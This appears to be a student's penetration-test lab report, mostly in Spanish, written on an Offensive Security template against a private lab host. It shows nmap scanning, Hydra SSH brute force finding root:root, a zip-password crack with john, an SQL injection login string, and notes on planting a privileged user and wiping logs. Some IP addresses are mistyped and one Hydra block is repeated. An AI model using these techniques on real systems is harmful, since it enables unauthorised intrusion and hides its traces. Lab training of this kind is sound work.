Internal Lab

David Elías Mayorga Velásquez

OSID: M3.Laboratorio

©
All rights reserved to Offensive Security, 2014
No part of this publication, in whole or in part, may be reproduced, copied, transferred or any other right reserved to its copyright owner,
including photocopying and all other copying, any transfer or transmission using any network or other means of communication, any
broadcast for distant learning, in any form or by any means such as any information storage, transmission or retrieval system, without prior
written permission from Offensive Security.

Table of Contents
1.0 Offensive Security Lab and Exam Penetration Test Report 2

1.1 Introduction 3
1.2 Objective 3
1.3 Requirements 3

2.0 Sample Report – High-Level Summary 4

2.1 Sample Report - Recommendations 4

3.0 Sample Report – Methodologies 5

3.1 Sample Report – Information Gathering 5
3.2 Sample Report – Service Enumeration 6
3.3 Sample Report – Penetration 7
3.4 Sample Report – Maintaining Access 15
3.5 Sample Report – House Cleaning 15
4.0 Additional Items Not Mentioned in the Report 15
1.0 Offensive Security Lab and Exam Penetration Test Report
1.1 Introduction
The Module Lab 3 and Exam penetration test report contains all efforts that were conducted in
order to pass the Offensive Security course. This report should contain all lab data in the report
template format as well as all items that were used to pass the overall exam. This report will be
graded from a standpoint of correctness and fullness to all aspects of the lab and exam. The
purpose of this report is to ensure that the student has a full understanding of penetration testing
methodologies as well as the technical knowledge to pass the qualifications for the Offensive
Security Certified Professional.
1.2 Objective
The objective of this assessment is to perform an internal penetration test against the Offensive
Security Lab and Exam network. The student is tasked with following a methodical approach in
obtaining access to the objective goals. This test should simulate an actual penetration test and
how you would start from beginning to end, including the overall report. An example page has
already been created for you at the latter portions of this document that should give you ample
information on what is expected to pass this course. Use the sample report as a guideline to get
you through the reporting.
1.3 Requirements
The student will be required to fill out this penetration testing report fully and to include the
following sections:
• Overall High-Level Summary and Recommendations (non-technical)
• Methodology walkthrough and detailed outline of steps taken
• Each finding with included screenshots, walkthrough, sample code, and
proof.txt if applicable.
• Any additional items that were not included
2.0 Sample Report – High-Level Summary

Welcome agent, in this case Little information we can supply you, our field agent has not put on Contact
and "the dead man device" was activated. This activated all the alarms of the house for this reason we put
ourselves in contact with you.

 Retrieve information from our field agent

2.1 Sample Report - Recommendations

It is recommended to fix and patch the vulnerabilities identified during testing to ensure that an
attacker cannot exploit these systems in the future.
Tools:
Internet
Google
OSINT Framework
FOCA
TOR
3.0 Sample Report – Methodologies
A widely adopted approach to penetration testing was used that is effective in testing how safe
the laboratories are. Below is a breakdown of how to identify and exploit the variety of
individual vulnerabilities found.

3.1 Sample Report – Information Gathering

The information gathering portion of a penetration test focuses on identifying the scope of the
penetration test. The specific hash were:
Continuing with the collection of information on a penetration test focuses on identifying the scope of the
penetration test. The specific IP addresses were:

Lab Network
172.20.0.105
3.2 Sample Report – Service Enumerationpen
Target: 172.20.0.105
nmap -p- --open -T4 -v -n 172.20.0.105
Port open port

with hidden login

Port 1235 Open
3.3 Sample Report – Penetration
Vulnerability Exploited: Credenciales de administrador por defecto en web login
System Vulnerable: 172.20.150/login.html
Vulnerability Explanation: Realizar fuerza bruta al login web consiste en automatizar el
proceso de login al servicio y realizar peticiones de login hasta que se encuentre una
combinación válida de usuario/contraseña. Esta vulnerabilidad se permite por malas prácticas
durante la configuración de la herramienta, permitiendo que se pueda realizar login como un
usuario válido.
Vulnerability Fix: Para resolver esta vulnerabilidad es necesario denegar el acceso remoto por
en WAN para el usuario administrador “root” y de ser necesario conceder este acceso, se
recomienda utilizar combinaciones de contraseñas que cumplan los estándares de seguridad de
una contraseña robusta.
Severity: Critical
Proof of Concept Code Here: Realizamos cracking con listado de usuarios y contraseñas
posibles en el servicio.

┌──(root💀kali)-[/home/kali/Desktop]

└─# hydra -L ./wordlist -P ./wordlist ssh://172.20.0.150 1 ⚙

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret
service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and
ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-11-28 14:32:51

[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce
the tasks: use -t 4

[DATA] max 16 tasks per 1 server, overall 16 tasks, 36 login tries (l:6/p:6), ~3 tries per task

[DATA] attacking ssh://172.20.0.150:22/

[22][ssh] host: 172.20.0.150 login: root password: root

[22][ssh] host: 172.20.0.150 password: root

1 of 1 target successfully completed, 2 valid passwords found

Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-11-28 14:33:05

Screenshots:

Flags obtained:
Vulnerability Exploited: Credenciales de administrador por defecto en SSH
System Vulnerable: 172.20.150:22
Vulnerability Explanation: Realizar fuerza bruta al login de SSH consiste en automatizar el
proceso de login al servicio y realizar peticiones de login hasta que se encuentre una
combinación válida de usuario/contraseña. Esta vulnerabilidad se permite por malas prácticas
durante la configuración de la herramienta, permitiendo que se pueda realizar login como un
usuario válido.
En el servicio SSH de la máquina se puede obtener el usuario “root” con credenciales por
defecto, entregando el poder total de la máquina y el listado de usuarios con sus respectivas
claves.
Vulnerability Fix: Para resolver esta vulnerabilidad es necesario denegar el acceso remoto por
SSH para el usuario administrador “root” y de ser necesario conceder este acceso, se recomienda
utilizar combinaciones de contraseñas que cumplan los estándares de seguridad de una
contraseña robusta.
Severity: Critical
Proof of Concept Code Here: Realizamos cracking con listado de usuarios y contraseñas
posibles en el servicio.

┌──(root💀kali)-[/home/kali/Desktop]

└─# hydra -L ./wordlist -P ./wordlist ssh://172.20.0.150 1 ⚙

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret
service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and
ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-11-28 14:32:51

[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce
the tasks: use -t 4

[DATA] max 16 tasks per 1 server, overall 16 tasks, 36 login tries (l:6/p:6), ~3 tries per task

[DATA] attacking ssh://172.20.0.150:22/

[22][ssh] host: 172.20.0.150 login: root password: root

[22][ssh] host: 172.20.0.150 password: root

1 of 1 target successfully completed, 2 valid passwords found

Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-11-28 14:33:05

Screenshots:
Flags obtained:
Considerando que ya se obtuvo acceso como root y ya tengo control de la máquina y sus
usuarios, evitare hacer login en cada usuario e iré directo a la revelación de las 5 flags.
• flagadmin.txt

• Flagsmb.txt
 • Flagftp.txt

• flagdolbuck.txt

• Comp.txt
Una vez obtenido el zip se obtiene y descifra

root@ubuntu:/home# locate comprimido.zip

/home/comprimido.zip

/home/dolbuckfb/comprimido.zip

/var/www/html/comprimido.zip

┌──(kali㉿kali)-[~]

└─$ scp [email protected]:/home/dolbuckfb/comprimido.zip .

[email protected]'s password:

comprimido.zip 100% 270 1.0KB/s 00:00

──(kali㉿kali)-[~]

└─$ zip2john comprimido.zip > hash.txt

ver 1.0 efh 5455 efh 7875 comprimido.zip/comp.txt PKZIP Encr: 2b chk, TS_chk, cmplen=88,
decmplen=76, crc=D543286C ts=8445 cs=8445 type=0

┌──(kali㉿kali)-[~]

└─$ zip2john comprimido.zip > hash.txt

ver 1.0 efh 5455 efh 7875 comprimido.zip/comp.txt PKZIP Encr: 2b chk, TS_chk, cmplen=88,
decmplen=76, crc=D543286C ts=8445 cs=8445 type=0

┌──(kali㉿kali)-[~]

└─$ john hash.txt --show

comprimido.zip/comp.txt:123456789:comp.txt:comprimido.zip::comprimido.zip

1 password hash cracked, 0 left

Ingresamos con la clave obtenida “123456789”.

Vulnerability Exploited: MySQL Injection y login oculto expuesto.

System Vulnerable: 170.20.0.150
Vulnerability Explanation: Todas las páginas web están propensas a recibir inspecciones y
ataques de SQL Injection, durante el escaneo de la web alojada en el puerto 80 se logra
identificar login vulnerable a SQL Injection para acceder como administrador al portal y con
contraseña de administrador débil. Además, en la inspección de la web se encuentran
documentos expuestos que contienen las credenciales de usuarios válidos para acceder a los
servicios de Samba y SSH.
Cabe destacar que en la página principal se encuentra un botón oculto que expone otro camino
hacia login secreto, esto mediante la alteración del código html o copiando el
redireccionamiento.
Vulnerability Fix:
Para SQL Injection, se debe modificar el código desarrollado en la aplicación web, sanitizando
los datos que son ingresados en el login para que estos sean procesados correctamente y no se
logre ingresos indebidos.
Las direcciónes ocultos deben ser más complejas y los usuarios, en especial los administradores,
deben tener contraseñas robustas.
Severity: Critical
Proof of Concept Code Here:
• Para ingreso por SQL Injection:
usuario : admin / ‘or 0=0’

Screenshot Here:
documento con hashes encontrado en 172.20.0.150/secret. (hashes descifrados)

Conexión por ssh con usuario válido (se obtiene flag dolbuckfb y comprimido.zip con flag camp
)
Repositorios ocultos (se obtiene flag ftpd)
Conexion por Samba (se obtiene flag smb)

3.4 Sample Report – Maintaining Access

Ya con las credenciales de acceso de root y de usuarios es posible mantener acceso con bajo
perfil pero de llegar a cambiar las contraseñas, se crea usuario con privilegios para mantener
acceso al sistema.

3.5 Sample Report – House Cleaning

na vez realizado el proceso se procede a eliminar todos los logs y archivos que puedan contener
registros de nuestros movimientos dentro de la máquina
4.0 Additional Items Not Mentioned in the Report